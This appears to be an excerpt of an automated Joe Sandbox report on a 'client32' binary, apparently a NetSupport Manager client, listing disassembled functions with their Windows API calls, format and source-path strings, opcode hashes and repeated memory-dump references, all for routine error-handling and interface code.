                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                    • API String ID: 3552358119-2709163689
                                                                                                                                    • Opcode ID: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                                                                    • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                                                                    • Opcode Fuzzy Hash: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                                                                    • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11147850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,762DC740,00000010), ref: 111478DB
                                                                                                                                    • wvsprintfA.USER32 ref: 111478F2
                                                                                                                                    Strings
                                                                                                                                    • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FormatMessagewvsprintf
                                                                                                                                    • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                                    • API String ID: 65494530-3330918973
                                                                                                                                    • Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                                                                    • Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
                                                                                                                                    • Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
                                                                                                                                    • Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,20F29797,00000000,00020019,?,00000000), ref: 110ED600
                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32 ref: 110ED2DB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: QueryValuewvsprintf
                                                                                                                                    • String ID: ($Error %d getting %s
                                                                                                                                    • API String ID: 141982866-3697087921
                                                                                                                                    • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                    • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                                                    • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                    • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • wvsprintfA.USER32 ref: 110D1572
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                    • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                    • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                                                    • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                    • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11015049
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                                    • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                                                                    • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                                    • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C548 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
                                                                                                                                      • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                                                    • InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterHandleIncrementInterlockedModuleSection
                                                                                                                                    • String ID: KERNEL32.DLL
                                                                                                                                    • API String ID: 2650740867-2576044830
                                                                                                                                    • Opcode ID: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                                                                                    • Instruction ID: a1ea6c524cc80d8162a63b7122f67c86dce844b07e1b6a5dabb7ffb63b15338b
                                                                                                                                    • Opcode Fuzzy Hash: c30498e3d86330ae44e1c52ec9b4aa2f09ed67631497381de44178ba0653ec91
                                                                                                                                    • Instruction Fuzzy Hash: F001A175541B029FE7218FA9C844749FBE0AF51319F10890ED4A657B90CBB1A640CF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • wvsprintfA.USER32 ref: 110D15EB
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                    • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                                    • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                                                                    • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                                    • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 110143BE
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateErrorExitImageLastList_MessageProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\imagelst.cpp$m_hImageList
                                                                                                                                    • API String ID: 756090014-1731862680
                                                                                                                                    • Opcode ID: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                                                                                    • Instruction ID: ed28c1bf2740c29e09f0e670a8a7b9fc6316d817cb7ee806623638b648209f33
                                                                                                                                    • Opcode Fuzzy Hash: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                                                                                    • Instruction Fuzzy Hash: 50F062B1600719AFC320CF59D805A97B7E8EF98310B00852DF99AC3600D370E8508FA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110366C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetProcAddress.KERNEL32(?,GetTouchInputInfo), ref: 110366D4
                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,110CCACD,?,?,00000000,00000028), ref: 110366FD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                    • String ID: GetTouchInputInfo
                                                                                                                                    • API String ID: 199729137-2645705246
                                                                                                                                    • Opcode ID: 9ceffe0a37e14ef8a269f4e8820ad903cddcead8d4f592114ead370e62f6856a
                                                                                                                                    • Instruction ID: accd5b272767643cf4b225b113550b3e2a65183479eda68bcc45fc9046dee9d6
                                                                                                                                    • Opcode Fuzzy Hash: 9ceffe0a37e14ef8a269f4e8820ad903cddcead8d4f592114ead370e62f6856a
                                                                                                                                    • Instruction Fuzzy Hash: 6AF08272A5122CAFD714DF94E944F97B7E8EB4C751F00452AF999D7640C670E810CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetPropA.USER32 ref: 1115F395
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                                                                    • API String ID: 1134434899-3115850912
                                                                                                                                    • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                                    • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                                                                    • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                                                                    • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110151F9
